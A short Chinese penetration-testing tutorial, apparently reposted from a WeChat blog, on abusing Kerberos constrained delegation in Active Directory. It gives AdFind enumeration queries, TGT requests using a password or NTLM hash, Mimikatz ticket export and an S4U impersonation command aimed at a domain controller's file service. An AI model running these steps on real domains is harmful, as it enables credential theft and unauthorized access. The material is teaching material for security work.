⾮约束委派(Unconstrained delegation) 约束委派(Constrained Delegation) 基于资 源的约束委派(Resource Based Constrained Delegation)
S4u2self:服务账户可以为自己请求一个针对自己的 Kerberos 服务票据(ST);如果服务账户的userAccountControl 标志为TRUSTED_TO_AUTH_FOR_DELEGATION, 则服务账户可以代表任何其他用户请求一个针对自身服务的 TGS/ST。 S4u2proxy:可以使⽤某⽤户身份的ST1去向KDC请求⼀张⽤于访问指定⽂件服务器的ST2,这张ST2的身份属于⽤户。这样服务账户就可以利⽤⽤户的权限去访问指定⽂件服务器上的⽂件了。
AdFind.exe -b "DC=testdc,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
AdFind.exe -h 10.10.10.5 -u winserver -up Test1234 -b "DC=testdc,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
AdFind.exe -b "DC=testdc,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
tgt::ask /user:winserver /domain:testdc.com /password:Test1234 /ticket:winserver.kirbi
tgt::ask /user:winserver /domain:testdc.com /NTLM:768623e06fae601be0c04759c87d93d3 /ticket:winserver.kirbi
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit
tgs::s4u /tgt:winserver.kirbi /user:[email protected] /service:cifs/DC.hack.com
原文始发于微信公众号(XG小刚):域渗透-约束委派
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论